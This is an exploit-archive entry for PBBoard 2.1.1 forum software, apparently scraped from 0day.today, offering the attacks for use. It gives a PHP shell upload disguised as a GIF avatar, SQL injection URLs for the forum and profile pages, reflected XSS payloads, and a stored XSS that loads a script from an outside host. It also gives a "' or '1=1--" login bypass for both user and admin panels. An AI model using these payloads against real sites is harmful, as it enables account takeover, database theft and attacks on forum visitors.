PBBoard 2.1.1 Multiple Remote Vulnerabilities

2010-09-28T00:00:00
ID 1337DAY-ID-14224
Type zdt
Reporter JiKo
Modified 2010-09-28T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =============================================
PBBoard 2.1.1 Multiple Remote Vulnerabilities
=============================================

  |=-----------------------------------------------------=|
  |=-------------=[  JIKO |No-exploit.Com|  ]=-----------=|
  |=-----------------------------------------------------=|
[~]-----------|00|
NAme    :JIKO (JAWAD)
Home    :No-exploit.Com
Mail    : !x!
[~]-----------|01|
    -{Script}
    name :PBBoard_v2.1.1
    link :http://www.pbboard.com/PBBoard_v2.1.1.zip
  
[~]-----------|02|
    -{3xpl01t}
     
    upload Shell and file .exe ....etc :(
    http://localhost/ara/index.php?page=usercp&control=1&avatar=1&main=1
    select From my Pc
    and upload your Shell php with GIF89a; you can see the size of img is long use a programme for inser php code in img
     
    sql & xss
    all script is infected :(
    inser '( in all % variable in the script
    SQl :/index.php?page=forum&show=1&id=2'a
    Xss :/index.php?page=forum&show=1&id=2'a<br>hello <script>alert(123)</script>
     
    SQl :/index.php?page=profile&show=1&username=jawad'
    SQl :/index.php?page=profile&show=1&username=jawad' and id='1
    Xss :/index.php?page=profile&show=1&username=jawad'a<br>hello <script>alert(123)</script>
    ........etc
     
    Xss In Profil
     
    Url :/index.php?page=usercp&control=1&avatar=1&main=1
    Select img From Url
    http://"><SCRIPT/XSS SRC="http://no-exploit/xss.js"></SCRIPT>.gif
     
    Login :(
     
    User : real name of admin or member you want | jawad' or '1=1--
    Pass : jiko
     
    for admin panel
     
    Url  : /admin.php
    User : jawad' or '1=1--
    Pass : jiko
    :((..Etc exploit
     
     
[~]-----------|03|
    -{Greetz}
    All my friends
    |No-Exploit.com Members
-------------------------------------



#  0day.today [2018-03-12]  #